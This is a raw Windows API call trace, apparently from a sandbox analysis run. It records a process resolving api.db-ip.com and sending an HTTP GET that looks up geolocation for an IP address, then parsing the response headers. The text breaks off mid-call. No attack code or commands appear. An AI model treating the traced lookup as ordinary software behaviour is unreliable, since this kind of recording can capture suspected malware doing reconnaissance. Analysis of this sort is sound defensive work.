GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] ResetEvent (hEvent=0x3f0) returned 1 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.297] GetCurrentThreadId () returned 0x1358 [0103.298] ResetEvent (hEvent=0x3f0) returned 1 [0103.298] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x2d1)) [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] SetEvent (hEvent=0x3f4) returned 1 [0103.298] SetEvent (hEvent=0x3f0) returned 1 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] ResetEvent (hEvent=0x3f0) returned 1 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] ResetEvent (hEvent=0x3f0) returned 1 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] SetEvent (hEvent=0x3f4) returned 1 [0103.298] SetEvent (hEvent=0x3f0) returned 1 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] ResetEvent (hEvent=0x3f0) returned 1 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] GetCurrentThreadId () returned 0x1358 [0103.298] ResetEvent (hEvent=0x3f0) returned 1 [0103.298] CloseHandle (hObject=0x3f0) returned 1 [0103.298] CloseHandle (hObject=0x3f4) returned 1 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] shutdown (s=0x3d0, how=1) returned 0 [0103.299] closesocket (s=0x3d0) returned 0 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.299] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] GetCurrentThreadId () returned 0x1358 [0103.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0103.301] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0103.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0103.302] socket (af=2, type=1, protocol=0) returned 0x3d0 [0103.302] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0103.302] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0103.302] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0103.302] htons (hostshort=0x0) returned 0x0 [0103.302] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0103.302] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc220, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0103.302] htons (hostshort=0x20c2) returned 0xc220 [0103.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0103.303] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eb48*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c178*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0103.304] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1eb48*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c178*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0103.304] htons (hostshort=0x50) returned 0x5000 [0103.304] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0103.326] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc220, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0103.326] htons (hostshort=0x20c2) returned 0xc220 [0103.326] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0103.326] htons (hostshort=0x5000) returned 0x50 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0103.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.326] GetCurrentThreadId () returned 0x1358 [0103.327] send (s=0x3d0, buf=0x24730e8*, len=191, flags=0) returned 191 [0103.327] GetTickCount64 () returned 0x115b206 [0103.327] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0103.366] recv (in: s=0x3d0, buf=0x242e938, len=32768, flags=0 | out: buf=0x242e938*) returned 505 [0103.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0103.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b226 [0103.366] GetTickCount64 () returned 0x115b235 [0103.366] GetTickCount64 () returned 0x115b235 [0103.366] GetTickCount64 () returned 0x115b235 [0103.367] GetTickCount64 () returned 0x115b235 [0103.367] GetTickCount64 () returned 0x115b235 [0103.367] GetTickCount64 () returned 0x115b235 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.367] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0103.369] GetCurrentThreadId () returned 0x1358 [0103.369] GetCurrentThreadId () returned 0x1358 [0103.369] GetCurrentThreadId () returned 0x1358 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0103.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0103.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 